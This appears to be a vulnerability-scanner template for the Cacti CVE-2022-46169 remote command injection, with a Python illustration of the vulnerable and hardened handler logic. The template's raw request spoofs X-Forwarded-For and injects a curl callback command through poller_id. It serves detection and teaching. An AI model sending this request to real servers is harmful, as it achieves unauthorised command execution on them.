id: CVE-2022-46169

info:
  name: Cacti <=1.2.22 - Remote Command Injection
  author: Hardik-Solanki,j4vaovo
  severity: critical
  description: |
    Cacti through 1.2.22 is susceptible to unauthenticated remote command injection. The remote agent (remote_agent.php) authorizes callers by client IP address but derives that address from client-supplied proxy headers, so an attacker can send X-Forwarded-For: 127.0.0.1 to pass as a registered poller. The poller_id request parameter is then concatenated into an OS command, and a specially crafted request executes arbitrary commands on the server, making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. The command runs only when the requested data source is one Cacti polls via a script, so at least one monitored device must have such a data source; this template probes local_data_id 1 on host_id 1, and a missed out-of-band callback on an instance where that data source is absent or not script-based does not by itself rule the version out.
  remediation: |
    Upgrade Cacti to version 1.2.23 or later to mitigate this vulnerability.
  reference:
    - https://security-tracker.debian.org/tracker/CVE-2022-46169
    - https://github.com/Cacti/cacti/security/advisories/GHSA-6p93-p743-35gf
    - https://www.cybersecurity-help.cz/vdb/SB2022121926
    - https://nvd.nist.gov/vuln/detail/CVE-2022-46169
    - https://github.com/Cacti/cacti/commit/7f0e16312dd5ce20f93744ef8b9c3b0f1ece2216
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-46169
    cwe-id: CWE-78,CWE-74
    epss-score: 0.96741
    epss-percentile: 0.99541
    cpe: cpe:2.3:a:cacti:cacti:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: cacti
    product: cacti
    shodan-query: title:"Login to Cacti"
  tags: cve,cve2022,auth-bypass,cacti,kev,rce,unauth

variables:
  useragent: '{{rand_base(6)}}'

http:
  - raw:
      - |
        GET /remote_agent.php?action=polldata&local_data_ids[0]=1&host_id=1&poller_id=;curl%20{{interactsh-url}}%20-H%20'User-Agent%3a%20{{useragent}}'; HTTP/1.1
        Host: {{Hostname}}
        X-Forwarded-For: 127.0.0.1

    unsafe: true
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"value":'
          - '"local_data_id":'
        condition: and

      - type: word
        part: interactsh_protocol
        words:
          - "http"

      - type: word
        part: interactsh_request
        words:
          - "User-Agent: {{useragent}}"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100a88f1681161e4e55054e9ebf3e2b192b22a7e3fe74bb3f8411c92c01a2abe5280221009d43c5e0fdd3913d6b5a12ce4e7db072a5bebcc94e1d2e846d7896ee48b1baa7:922c64590222798bb761d5b6d8e72950
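The template above chains two weaknesses: an IP allowlist that trusts a client-supplied X-Forwarded-For header, and a request parameter (poller_id) spliced into a shell command. The following Python is an added illustration of that pattern and its hardened counterpart; it is not Cacti's code, not the template authors' code, and not the upstream fix. The allowlist, proxy set, command paths, the `handle_polldata` handler and the `shell_commands` splitter are hypothetical, and the attacker request is constructed from the template's own payload (URL-decoded, with a placeholder callback host).

```python
import ipaddress

# Hypothetical registered pollers and the reverse proxy we operate (constructed data).
ALLOWED_POLLERS = {"127.0.0.1", "10.0.0.5"}
TRUSTED_PROXIES = {"10.0.0.2"}


def client_addr_vulnerable(headers, remote_addr):
    """Bug 1: take the client address from attacker-controlled proxy headers."""
    for name in ("Client-IP", "X-Forwarded-For"):
        value = headers.get(name)
        if value:
            return value.split(",")[0].strip()
    return remote_addr


def client_addr_hardened(headers, remote_addr):
    """Fix 1: honour X-Forwarded-For only when the TCP peer is our own proxy."""
    xff = headers.get("X-Forwarded-For")
    if xff and remote_addr in TRUSTED_PROXIES:
        # Our proxy appends the peer it saw as the last hop; earlier hops are unverified.
        candidate = xff.split(",")[-1].strip()
    else:
        candidate = remote_addr
    return str(ipaddress.ip_address(candidate))  # raises ValueError on garbage


def poller_authorized(addr):
    return addr in ALLOWED_POLLERS


def poll_command_vulnerable(local_data_id, poller_id):
    """Bug 2: request parameters concatenated into a string handed to a shell (CWE-78)."""
    return f"/usr/bin/php /var/www/cacti/poller.php {local_data_id} {poller_id}"


def poll_command_hardened(local_data_id, poller_id):
    """Fix 2: validate as positive integers and return argv for subprocess.run(shell=False)."""
    try:
        lid, pid = int(local_data_id), int(poller_id)
    except (TypeError, ValueError):
        raise ValueError("local_data_id and poller_id must be integers")
    if lid <= 0 or pid <= 0:
        raise ValueError("ids must be positive")
    return ["/usr/bin/php", "/var/www/cacti/poller.php", str(lid), str(pid)]


def shell_commands(cmd):
    """Rough model of a POSIX shell splitting an unquoted command line on ';'."""
    return [part.strip() for part in cmd.split(";") if part.strip()]


def handle_polldata(headers, remote_addr, params, hardened):
    """Hypothetical action=polldata handler. Returns ('executed', argv) or ('denied', reason)."""
    get_addr = client_addr_hardened if hardened else client_addr_vulnerable
    try:
        addr = get_addr(headers, remote_addr)
    except ValueError:
        return ("denied", "bad client address")
    if not poller_authorized(addr):
        return ("denied", f"{addr} is not a registered poller")
    try:
        if hardened:
            argv = poll_command_hardened(params["local_data_id"], params["poller_id"])
        else:
            argv = shell_commands(poll_command_vulnerable(params["local_data_id"], params["poller_id"]))
    except ValueError as exc:
        return ("denied", str(exc))
    return ("executed", argv)


# Constructed attacker request: the template's header and URL-decoded poller_id payload.
ATTACK_HEADERS = {"X-Forwarded-For": "127.0.0.1"}
ATTACK_PARAMS = {
    "local_data_id": "1",
    "poller_id": ";curl http://oob.example -H 'User-Agent: abc123';",
}

if __name__ == "__main__":
    for hardened in (False, True):
        print("hardened" if hardened else "vulnerable",
              handle_polldata(ATTACK_HEADERS, "203.0.113.9", ATTACK_PARAMS, hardened))
```

Against the vulnerable handler the spoofed header passes the poller check and the shell sees `curl ...` as a second command, which is exactly what the template's interactsh matchers look for. The hardened handler denies the same request twice over: the peer address 203.0.113.9 is not a proxy, so the header is ignored, and even a genuinely local caller cannot get a non-integer poller_id past validation.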